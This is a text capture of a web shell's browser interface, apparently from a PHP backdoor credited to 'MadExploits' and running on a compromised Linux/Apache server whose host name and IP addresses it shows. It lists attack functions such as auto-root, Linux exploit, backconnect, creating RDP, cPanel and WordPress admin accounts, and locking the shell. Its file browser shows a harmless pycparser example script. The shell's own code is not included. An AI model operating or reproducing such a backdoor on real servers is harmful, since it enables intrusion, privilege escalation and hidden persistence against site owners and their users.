Linux server.nvwebsoft.co.in 3.10.0-1160.114.2.el7.x86_64 #1 SMP Wed Mar 20 15:54:52 UTC 2024 x86_64
Apache
: 162.240.12.249 | : 18.191.118.36
202 Domain
8.1.31
nbspublicschool
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
doc /
python-pycparser-2.14 /
examples /
[ HOME SHELL ]
Name
Size
Permission
Action
c_files
[ DIR ]
drwxr-xr-x
c-to-c.py
1.42
KB
-rw-r--r--
cdecl.py
3.05
KB
-rw-r--r--
explore_ast.py
5.27
KB
-rw-r--r--
func_calls.py
1.08
KB
-rw-r--r--
func_defs.py
1.08
KB
-rw-r--r--
rewrite_ast.py
599
B
-rw-r--r--
using_cpp_libc.py
744
B
-rw-r--r--
using_gcc_E_libc.py
797
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : using_cpp_libc.py
#----------------------------------------------------------------- # pycparser: using_cpp_libc.py # # Shows how to use the provided 'cpp' (on Windows, substitute for # the 'real' cpp if you're on Linux/Unix) and "fake" libc includes # to parse a file that includes standard C headers. # # Copyright (C) 2008-2015, Eli Bendersky # License: BSD #----------------------------------------------------------------- import sys from pycparser import parse_file if __name__ == "__main__": if len(sys.argv) > 1: filename = sys.argv[1] else: filename = 'examples/c_files/year.c' ast = parse_file(filename, use_cpp=True, cpp_path='cpp', cpp_args=r'-Iutils/fake_libc_include') ast.show()
Close